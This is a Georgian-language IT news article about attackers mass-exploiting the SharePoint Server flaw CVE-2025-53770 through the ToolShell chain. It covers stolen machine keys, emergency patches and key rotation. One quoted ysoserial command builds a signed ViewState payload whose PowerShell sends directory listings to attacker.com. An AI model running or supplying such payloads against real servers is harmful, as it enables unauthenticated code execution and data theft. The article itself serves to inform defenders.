SharePoint-ის 9.8 სიმძიმის მოწყვლადობას მთელი მსოფლიოს მასშტაბით იყენებენ

მიმდინარე შეტევები ჰაკერებს საშუალებას აძლევს, მოიპარონ ავტორიზაციის მონაცემები, რომლებიც პრივილეგირებულ წვდომას იძლევა.

ხელისუფლება და მკვლევრები განგაშს ტეხენ Microsoft SharePoint Server-ის მაღალი სირთულის მოწყვლადობის აქტიური მასობრივი ექსპლუატაციის გამო. ეს შეტევები ჰაკერებს საშუალებას აძლევს, კომპანიების მგრძნობიარე მონაცემები, მათ შორის ქსელის შიდა სისტემებზე წვდომისთვის საჭირო ავთენტიფიკაციის ტოკენები, მოიპარონ. მკვლევრების თქმით, ნებისმიერმა, ვინც SharePoint-ის ლოკალურ (on-premises) ინსტანციას იყენებს, უნდა ჩათვალოს, რომ მისი ქსელი უკვე გატეხილია.

მოწყვლადობას, რომელიც აღინიშნება, როგორც CVE-2025-53770, სირთულის რეიტინგი 10-დან 9.8 აქვს. ის არაავტორიზებულ პირებს ინტერნეტთან დაკავშირებულ SharePoint Server-ებზე დისტანციურ წვდომას აძლევს. პარასკევიდან, მკვლევრებმა მოწყვლადობის აქტიური ექსპლუატაციის შესახებ დაიწყეს გაფრთხილებების გავრცელება. პრობლემა ეხება SharePoint Server-ის იმ ვერსიებს, რომლებსაც მომხმარებლები საკუთარ ინფრასტრუქტურაზე აყენებენ. Microsoft-ის ღრუბლოვანი SharePoint Online და Microsoft 365 დაცულია.

Microsoft-მა შაბათს დაადასტურა შეტევები იმ დროისთვის ნულოვანი დღის ექსპლოიტზე. ერთი დღის შემდეგ, კვირას, კომპანიამ გამოუშვა საგანგებო განახლება, რომელიც ამ და მასთან დაკავშირებულ, CVE-2025-53771-ით აღნიშნულ მოწყვლადობას, SharePoint Subscription Edition-სა და SharePoint 2019-ში ასწორებს. SharePoint 2016-ის ვერსია ამ დროისთვის პატჩის გარეშე რჩება.

ეს ტიპური ვებშელი არ არის

შაბათს, უსაფრთხოების ფირმა Eye Security-მ განაცხადა, რომ „ათობით აქტიურად კომპრომეტირებული სისტემა აღმოაჩინა შეტევის ორ ტალღაში, 18 ივლისს და 19 ივლისს“. სისტემები, რომლებიც მთელ მსოფლიოში იყო განაწილებული, გატეხილი იყო ამ მოწყვლადობის გამოყენებით და შემდეგ დაინფიცირებული ვებშელზე დაფუძნებული ბექდორით, სახელად ToolShell.

„ეს ტიპური ვებშელი არ იყო,“ — წერენ Eye Security-ს მკვლევრები. „არ იყო ინტერაქტიული ბრძანებები, რევერს-შელები ან მართვისა და კონტროლის ლოგიკა. ამის ნაცვლად, გვერდი იძახებდა შიდა .NET მეთოდებს SharePoint-ის სერვერის MachineKey კონფიგურაციის, მათ შორის ValidationKey-ს, წასაკითხად.“

კოდის დისტანციურად შესრულება (RCE) შესაძლებელი ხდება სერიალიზაციის პროცესის ექსპლუატაციით. ახლა, ToolShell-ის ჯაჭვით, თავდამსხმელებს შეუძლიათ ValidationKey-ს პირდაპირ მეხსიერებიდან ან კონფიგურაციიდან ამოღება. როგორც კი ეს კრიპტოგრაფიული მასალა გაჟონავს, თავდამსხმელს შეუძლია, შექმნას სრულად ვალიდური, ხელმოწერილი __VIEWSTATE პეილოუდები ისეთი ინსტრუმენტის გამოყენებით, როგორიცაა ysoserial.

# an example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="" \
--validationkey="" \
--validationalg="" \
--islegacy \
--minify

ამ პეილოუდებს შეუძლია ნებისმიერი საზიანო ბრძანების ჩაშენება და სერვერის მიერ სანდო ბრძანებად მიიღება, რაც RCE ჯაჭვს ავტორიზაციის გარეშე ასრულებს.

პატჩის დაყენება მხოლოდ დასაწყისია

თავდამსხმელები ამ შესაძლებლობას SharePoint-ის ASP.NET machine key-ების მოსაპარად იყენებენ, რაც მათ საშუალებას აძლევს, მოგვიანებით დამატებითი შეტევები განახორციელონ. ეს ნიშნავს, რომ მხოლოდ პატჩის დაყენება არ იძლევა გარანტიას, რომ თავდამსხმელები კომპრომეტირებული სისტემიდან განდევნილნი არიან.

დაზარალებულმა ორგანიზაციებმა აუცილებლად უნდა შეცვალონ (rotate) SharePoint-ის ASP.NET machine key-ები და გადატვირთონ IIS ვებ-სერვერი.

The Washington Post-ის თანახმად, სულ მცირე ორმა ფედერალურმა სააგენტომ აღმოაჩინა, რომ მათ ქსელში არსებული სერვერები ამ შეტევებისას დაზიანდა.

Eye Security-ს პოსტი შეიცავს ტექნიკურ ინდიკატორებს, რომელთა გამოყენებითაც ადმინისტრატორებს შეუძლიათ, დაადგინონ, გახდა თუ არა მათი სისტემები თავდასხმის სამიზნე. კვირას, აშშ-ის კიბერუსაფრთხოებისა და ინფრასტრუქტურის უსაფრთხოების სააგენტომ (CISA) დაადასტურა შეტევები და საკუთარი უსაფრთხოების ზომების სია გამოაქვეყნა.

ITNEWS-ის მეგობარი ვებ-გვერდია ITJOBS.GE. ITJOBS.GE-ზე ორგანიზაციებს და ფიზიკურ პირებს, აქვთ საშუალება განათავსონ როგორც ვაკანსები, ტრენინგები და ივენთები ასევე კონკრეტული Tech დავალებები, რისთვისაც ეძებენ დეველოპერებს, დიზაინერებს, სეო სპეციალისტებს და ა.შ. ITJOBS.GE - იპოვე დასაქმების საუკეთესო შესაძლებლობები ან გამოაქვეყნე ვაკანსია / დავალება და მიაწვდინე ხმა სასურველ აუდიტორიას.